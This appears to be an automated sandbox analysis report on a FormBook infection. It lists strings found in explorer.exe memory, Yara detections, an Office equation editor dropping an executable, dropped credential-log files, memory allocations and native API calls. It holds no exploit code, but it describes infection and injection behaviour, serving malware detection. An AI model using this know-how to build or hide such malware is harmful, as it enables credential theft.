Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2186469569.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: ieinstal.exe, 00000007.00000002.2209174425.0000000001FA0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: ieinstal.exe, 00000007.00000002.2209847092.0000000002187000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2185242317.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2186469569.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: ieinstal.exe, 00000007.00000002.2209174425.0000000001FA0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2184773447.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2193972637.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184984825.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2199403174.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\wlanext.exe Dropped file: C:\Users\user\AppData\Roaming\K89O2Q81\K89logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\wlanext.exe Dropped file: C:\Users\user\AppData\Roaming\K89O2Q81\K89logrv.ini Jump to dropped file
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Dropped file: C:\Users\user\AppData\Roaming\K89O2Q81\K89logrf.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Dhdvyxwl[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\name.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\name.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429D60 NtCreateFile, 7_2_10429D60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429E10 NtReadFile, 7_2_10429E10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429E90 NtClose, 7_2_10429E90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429F40 NtAllocateVirtualMemory, 7_2_10429F40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429E0D NtReadFile, 7_2_10429E0D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429E8C NtClose, 7_2_10429E8C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10429F3A NtAllocateVirtualMemory, 7_2_10429F3A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02680078 NtResumeThread,LdrInitializeThunk, 7_2_02680078
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02680048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_02680048
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026800C4 NtCreateFile,LdrInitializeThunk, 7_2_026800C4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0267FAE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0267FAD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0267FB68
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0267FBB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267F900 NtReadFile,LdrInitializeThunk, 7_2_0267F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267F9F0 NtClose,LdrInitializeThunk, 7_2_0267F9F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0267FED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_0267FEA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0267FFB4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0267FC60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_0267FC90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0267FDC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0267FD8C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02680060 NtQuerySection, 7_2_02680060
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026810D0 NtOpenProcessToken, 7_2_026810D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02681148 NtOpenThread, 7_2_02681148
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268010C NtOpenDirectoryObject, 7_2_0268010C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026801D4 NtSetValueKey, 7_2_026801D4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026807AC NtCreateMutant, 7_2_026807AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FA50 NtEnumerateValueKey, 7_2_0267FA50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FA20 NtQueryInformationFile, 7_2_0267FA20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FAB8 NtQueryValueKey, 7_2_0267FAB8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FB50 NtCreateKey, 7_2_0267FB50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FBE8 NtQueryVirtualMemory, 7_2_0267FBE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267F8CC NtWaitForSingleObject, 7_2_0267F8CC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02681930 NtSetContextThread, 7_2_02681930
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267F938 NtWriteFile, 7_2_0267F938
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FE24 NtWriteVirtualMemory, 7_2_0267FE24
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FF34 NtQueueApcThread, 7_2_0267FF34
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FFFC NtCreateProcessEx, 7_2_0267FFFC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02680C40 NtGetContextThread, 7_2_02680C40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FC48 NtSetInformationFile, 7_2_0267FC48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FC30 NtOpenProcess, 7_2_0267FC30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0267FD5C NtEnumerateKey, 7_2_0267FD5C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02681D80 NtSuspendThread, 7_2_02681D80
